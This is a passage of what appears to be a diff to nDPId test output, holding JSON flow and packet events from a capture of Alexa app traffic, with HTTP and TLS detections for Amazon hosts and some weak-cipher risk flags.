{"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82RlAAEAGFy6sECrYNFQ\/OMsZAFDfya3CAAAAAKAC\/\/8uwwAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ao9AAEAGhbisECrYNFQ\/OMsaAFCdOh5UAAAAAKAC\/\/8AwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ziFAAEAGIiasECrYNFQ\/OMsbAFAzpLr6AAAAAKAC\/\/\/NrgAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c6xAAEAGfJusECrYNFQ\/OMscAFApFQd3AAAAAKAC\/\/+LwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2286,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxx\/FDN0KRUHeKAScSCFPAAAAgQFtAQCCAps+nXPAPZ02wEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2287,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0apBAAEAGhb+sECrYNFQ\/OMsaAFCdOh5V47HfxIAQAVeHGAAAAQEICgD2dN9s+naY"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976140054,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976140054,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="} 